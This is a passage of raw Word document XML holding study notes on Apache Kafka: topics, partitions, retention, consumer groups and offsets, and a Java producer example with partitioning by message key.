          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> on disk.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="357BF260"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s help consumers </w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>track what they’ve read</w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F0E1E65"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p w14:paraId="0BB0FA8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retained for a </w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>configurable duration</w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (e.g., 7 days), regardless of consumption.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F8723C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You can also configure size-based retention.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E740E8A"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D264E">
          <v:rect id="_x0000_i3322" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="655E93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How Data is Stored</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="783B7E0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872"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E51096" w:rsidRPr="00E51096" w14:paraId="400A81FB" w14:textId="77777777" w:rsidTr="00D93542">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1D5E065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0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3B261BEF"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1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E51096" w:rsidRPr="00E51096" w14:paraId="72A3326D" w14:textId="77777777" w:rsidTr="00D93542">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6E29521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login</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="423E7F37"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click</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E51096" w:rsidRPr="00E51096" w14:paraId="7B0A1ACE" w14:textId="77777777" w:rsidTr="00D93542">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="79D26A71"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logout</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="184A722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purchase</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E51096" w:rsidRPr="00E51096" w14:paraId="1C281424" w14:textId="77777777" w:rsidTr="00D93542">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4DB34C7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2 → scroll</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="72896657" w14:textId="77777777" w:rsidR="00D93542" w:rsidRPr="00E51096" w:rsidRDefault="00D93542" w:rsidP="00E51096">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4899585C"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stores this data on disk in a binary format.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DDF8C8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35B53">
          <v:rect id="_x0000_i3323" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="441DE47D"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Consumers Consume Data:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49D36F05"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p w14:paraId="4F56E3F7"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are grouped (e.g., user-activity-group).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="537449B4"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one partition to one consumer</w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> within a group (load balancing).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F3C6977"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ption:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BA6C35C"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 reads from assigned partitions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07A1850E"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eeps track of </w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>last committed offset</w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A7A1B63"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an </w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>re-read messages</w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> from a specific offset.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="197992BD"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 Management:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67FF141B"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 commit</w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w: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of offsets.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FB33988"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 is </w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>per consumer group per partition</w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59B2FB8F"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34296">
          <v:rect id="_x0000_i3324" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="42697F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roducer → Topic → Consumer Flow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="643B26D4"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         Topic (with partitions)         Consumer Group</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C4D7373"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                          ↓</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5252D3D9"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d(data)  →  partition 0 | partition 1  →  Consumer 1 | Consumer 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E961A33"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E609D">
          <v:rect id="_x0000_i3325" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F7805B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Advantages of Kafka’s Topic-Based Architecture:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A8052F6"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xml:space="preserve"> (via partitions)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57FB8F97"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urable</w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (data stored on disk)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68C08718"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xml:space="preserve"> (via replication)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D0B8B7F"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playable</w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (reprocess by reading from old offset)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DC8D270" w14:textId="049F7609" w:rsidR="00D93542" w:rsidRPr="00CE4B95"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3326" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0643BE65" w14:textId="7B7B4397"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25" w:name="_Toc197868039"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is a Kafka producer, and how does it send messages?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="825"/>
    </w:p>
    <w:p w14:paraId="76E08744" w14:textId="1AC66C8D" w:rsidR="00C46ACA" w:rsidRPr="00E51096" w:rsidRDefault="00C46ACA"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sends data (records/messages)</w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to a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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EB2326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4ED65">
          <v:rect id="_x0000_i3327" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3543F561"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0B2955EB"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responsible for:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BD1DD61"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ublishing messages to one or more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4D26B73E"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hoosing the correct </w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>partition</w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (either automatically or manually).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="615099AB"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ing</w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> the key and value into bytes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C240E49"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andling </w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>acks</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retries</w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> from the broker.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E44E63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E425F2">
          <v:rect id="_x0000_i3328" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="74403114"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Producer Send Messages?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DA7C473"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the </w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>basic flow</w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0828571B"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Producer Properties:</w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> You define configuration like:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EA26CC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erties props = new Properties();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0834744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bootstrap.servers", "localhost:9092");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F5C80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key.serializer", "org.apache.kafka.common.serialization.StringSerializer");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AAE691B"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value.serializer", "org.apache.kafka.common.serialization.StringSerializer");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10032F71"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a KafkaProducer:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="653FB4A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Producer&lt;String, String&gt; producer = new KafkaProducer&lt;&gt;(props);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58014F44"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nd Data to a Topic:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="454AC8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activity", "login");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60EE7CCD"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 async</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3836BA7C"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ptional) Add Callback:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="269D041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metadata, exception) -&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70B37093"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if (exception == null) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EF29F67"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Message sent to topic " + metadata.topic() + " partition " + metadata.partition());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CDA10C1"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else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44C189E4"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exception.printStackTrace();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FD3B822"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084BD50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03958B8"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lush and Close Producer:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="130D747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flush();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="063AE3F6"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close();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C481435"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06624">
          <v:rect id="_x0000_i3329" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="143C05CE"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Determines the Partition?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DB76D6D"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is provided → Kafka uses </w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>hash(key) % numPartitions</w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60EDD446"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w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>no key</w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> → Kafka uses </w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>round-robin</w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EF56DEE"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AB59E2">
          <v:rect id="_x0000_i3330" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4886F789"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Output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CD325D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sent to topic user-activity partition 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B5EEE70"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A3EEAB">
          <v:rect id="_x0000_i3331" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="13EE0FFD"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2723"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E51096" w:rsidRPr="00E51096" w14:paraId="5046771F" w14:textId="77777777" w:rsidTr="00C46ACA">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2EE8137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183F525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14E68BD3" w14:textId="77777777" w:rsidTr="00C46ACA">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3A54BDD9"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600402A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0, 1, or all – defines durability</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E51096" w:rsidRPr="00E51096" w14:paraId="521C6879" w14:textId="77777777" w:rsidTr="00C46ACA">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6B8ED83E"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20AC45F"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y count on failure</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E51096" w:rsidRPr="00E51096" w14:paraId="38D4F0DF" w14:textId="77777777" w:rsidTr="00C46ACA">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="26E0BC61"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16A7A79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ait time to batch messages</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E51096" w:rsidRPr="00E51096" w14:paraId="4C572920" w14:textId="77777777" w:rsidTr="00C46ACA">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5C296A8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3BE7F2B7"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ax batch size (in bytes)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="46D197E0" w14:textId="77777777" w:rsidR="00C46ACA" w:rsidRPr="00CE4B95"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3332" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D91043B" w14:textId="550FBAD7"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826" w:name="_Toc197868040"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Describe the Kafka producer role and how it sends messages to Kafka topics, including partitioning and message key concepts?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="826"/>
    </w:p>
    <w:p w14:paraId="714B6F93" w14:textId="549A2071" w:rsidR="001E64A1" w:rsidRPr="00E51096" w:rsidRDefault="001E64A1" w:rsidP="00FC2EFF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="71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a </w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>detailed breakdown of a Kafka Producer's rol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message sending mechanism</w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, and the </w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>partitioning logic using message keys</w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76044F83"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2B17D8">
          <v:rect id="_x0000_i3333" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E6B513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1616C7B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that sends (publishes) </w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>messages (records)</w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to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02F80462"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are the </w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
